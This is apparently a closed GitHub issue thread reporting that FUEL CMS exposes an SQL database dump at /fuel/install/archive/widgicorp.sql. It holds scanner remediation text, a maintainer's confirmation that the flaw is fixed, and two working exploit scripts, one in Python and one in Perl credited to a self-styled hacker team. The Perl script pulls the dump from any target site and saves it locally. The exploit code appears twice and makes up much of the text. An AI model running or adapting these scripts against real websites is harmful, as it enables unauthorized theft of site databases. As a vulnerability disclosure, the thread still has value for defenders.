Closed aaryansaharan closed 2 years ago
#########################################################################
to actors outside of the intended control sphere.
to an actor that is not explicitly authorized to have access to that information.
MySQL over the World Wide Web. It can be used to dump a database or a collection of
databases for backup or transfer to another SQL server (not necessarily a MySQL server).
The dump typically contains SQL statements to create the table, populate it, or both.
This file contains an phpMyAdmin SQL dump. This information is highly sensitive and
should not be found on a production system.
Acunetix inferred this filename from the domain name. A database backup contains a record of the
table structure and/or the data from a database and is usually in the form of a list of SQL statements.
A database backup is most often used for backing up a database so that its contents can be restored
in the event of data loss. This information is highly sensitive and should never be found on a production system.
Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible
to the web server. As a workaround, you could restrict access to this file.
###########################################################################
/fuel/install/archive/widgicorp.sql
Information :
-- phpMyAdmin SQL Dump -- version 2.10.2 -- phpmyadmin.net -- -- Host: localhost -- Server version: 5.0.45 -- PHP Version: 5.3.2 -- Database: fuel_widgicorp
fuel_widgicorp
raw.githubusercontent.com/daylightstudio/FUEL-CMS/master/fuel/install/archive/widgicorp.sql
Other File :
/fuel/install/archive/fuel_schema_0.9.3.sql
raw.githubusercontent.com/daylightstudio/FUEL-CMS/master/fuel/install/archive/fuel_schema_0.9.3.sql
import string import re from urllib2 import Request, urlopen disc = "/fuel/install/archive/widgicorp.sql" url = raw_input ("URL: ") req = Request(url+disc) rta = urlopen(req) print "Result" html = rta.read() rdo = str(re.findall("resources.=", html)) print rdo exit
use LWP::Simple; use LWP::UserAgent;
system('cls'); system('TheDayLightStudio GetFuelCMS Database Disclosure Exploit'); system('color a');
if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV;
$File="fuel/install/archive/widgicorp.sql"; my $url = "http://" . $TargetIP . $path . $File; print "\n Wait Please Dear Hacker!!! \n\n";
my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/fuel/install/archive/widgicorp.sql");
if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/fuel/install/archive/widgicorp.sql\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); }
Did 050de7 fix this issue? Can it be closed @daylightstudio?
Yes
#########################################################################
Impact :
to actors outside of the intended control sphere.
to an actor that is not explicitly authorized to have access to that information.
MySQL over the World Wide Web. It can be used to dump a database or a collection of
databases for backup or transfer to another SQL server (not necessarily a MySQL server).
The dump typically contains SQL statements to create the table, populate it, or both.
This file contains an phpMyAdmin SQL dump. This information is highly sensitive and
should not be found on a production system.
Acunetix inferred this filename from the domain name. A database backup contains a record of the
table structure and/or the data from a database and is usually in the form of a list of SQL statements.
A database backup is most often used for backing up a database so that its contents can be restored
in the event of data loss. This information is highly sensitive and should never be found on a production system.
Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible
to the web server. As a workaround, you could restrict access to this file.
###########################################################################
File :
/fuel/install/archive/widgicorp.sql
Information :
-- phpMyAdmin SQL Dump -- version 2.10.2 -- phpmyadmin.net -- -- Host: localhost -- Server version: 5.0.45 -- PHP Version: 5.3.2 -- Database:
fuel_widgicorp
raw.githubusercontent.com/daylightstudio/FUEL-CMS/master/fuel/install/archive/widgicorp.sql
Other File :
/fuel/install/archive/fuel_schema_0.9.3.sql
raw.githubusercontent.com/daylightstudio/FUEL-CMS/master/fuel/install/archive/fuel_schema_0.9.3.sql
###########################################################################
Database Disclosure Information Exposure Exploit 1 :
!/usr/bin/python
import string import re from urllib2 import Request, urlopen disc = "/fuel/install/archive/widgicorp.sql" url = raw_input ("URL: ") req = Request(url+disc) rta = urlopen(req) print "Result" html = rta.read() rdo = str(re.findall("resources.=", html)) print rdo exit
###########################################################################
Database Disclosure Information Exposure Exploit 2 :
!/usr/bin/perl -w
Author : KingSkrupellos
Team : Cyberizm Digital Security Army
use LWP::Simple; use LWP::UserAgent;
system('cls'); system('TheDayLightStudio GetFuelCMS Database Disclosure Exploit'); system('color a');
if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV;
$File="fuel/install/archive/widgicorp.sql"; my $url = "http://" . $TargetIP . $path . $File; print "\n Wait Please Dear Hacker!!! \n\n";
my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/fuel/install/archive/widgicorp.sql");
if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/fuel/install/archive/widgicorp.sql\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); }